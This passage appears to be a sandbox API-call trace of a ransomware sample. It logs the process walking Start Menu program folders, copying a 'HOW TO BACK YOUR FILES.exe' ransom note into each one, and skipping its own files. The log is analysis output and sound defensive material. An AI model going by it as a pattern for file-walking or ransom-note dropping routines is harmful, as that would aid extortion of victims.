Size=0x1dc00) returned 0x33afb0 [0089.988] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.988] CloseHandle (hObject=0x120) returned 1 [0089.988] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.988] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.988] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x595bf880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x595bf880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.988] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.988] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.988] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\SharePoint", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\SharePoint") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\SharePoint" [0089.988] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0089.988] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0089.988] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\SharePoint") returned 66 [0089.988] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\SharePoint" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\SharePoint") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\SharePoint" [0089.989] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.989] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\SharePoint\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\sharepoint\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.989] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.989] GetLastError () returned 0x0 [0089.989] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.989] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.989] CloseHandle (hObject=0x120) returned 1 [0089.989] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.989] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.990] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\SharePoint\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78038410, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x595e59e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x595e59e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.990] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.990] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.990] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office" [0089.990] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0089.990] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0089.990] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office") returned 72 [0089.990] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office" [0089.990] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.990] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\microsoft office\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.991] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.991] GetLastError () returned 0x0 [0089.991] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.991] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.991] CloseHandle (hObject=0x120) returned 1 [0089.991] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.991] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.991] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77f53bd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x596f0380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x596f0380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.991] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.991] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.992] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools" [0089.992] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0089.992] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0089.992] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools") returned 100 [0089.992] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools" [0089.992] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.992] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.992] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.992] GetLastError () returned 0x0 [0089.993] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.993] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.993] CloseHandle (hObject=0x120) returned 1 [0089.993] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.993] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.993] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77f53bd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x59788900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59788900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.993] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.993] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.993] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Maintenance", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Maintenance" [0089.993] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0089.993] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0089.993] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Maintenance") returned 67 [0089.993] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Maintenance" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Maintenance" [0089.993] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.993] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Maintenance\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\maintenance\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.994] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.994] GetLastError () returned 0x0 [0089.994] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.994] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.994] CloseHandle (hObject=0x120) returned 1 [0089.994] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.994] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.994] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x597fad20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x597fad20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.994] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.994] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.995] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Java", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Java") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Java" [0089.995] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0089.995] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0089.995] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Java") returned 60 [0089.995] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Java" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Java") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Java" [0089.995] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.995] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Java\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\java\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.995] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.996] GetLastError () returned 0x0 [0089.996] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.996] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.996] CloseHandle (hObject=0x120) returned 1 [0089.996] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.996] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.996] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Java\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7577bc60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x59b66cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59b66cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.996] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.996] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.996] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Games", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Games") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Games" [0089.996] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.996] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0089.996] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Games") returned 61 [0089.996] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Games" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Games") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Games" [0089.996] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.996] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Games\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\games\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.997] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.997] GetLastError () returned 0x0 [0089.997] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.997] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.997] CloseHandle (hObject=0x120) returned 1 [0089.997] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.997] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.997] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Games\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x59c4b500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59c4b500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.997] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.997] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.998] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Administrative Tools", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Administrative Tools" [0089.998] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0089.998] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0089.998] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Administrative Tools") returned 76 [0089.998] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Administrative Tools" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Administrative Tools" [0089.998] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.998] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Administrative Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\administrative tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.998] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.999] GetLastError () returned 0x0 [0089.999] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.999] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.999] CloseHandle (hObject=0x120) returned 1 [0089.999] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.999] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.999] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5a0298c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a0298c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0089.999] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.999] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.999] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories" [0089.999] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0089.999] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0089.999] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories") returned 67 [0089.999] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories" | out: lpString1="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories" [0089.999] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.999] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\start menu\\programs\\accessories\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.000] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.000] GetLastError () returned 0x0 [0090.000] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.000] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.000] CloseHandle (hObject=0x120) returned 1 [0090.000] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.000] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.000] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, 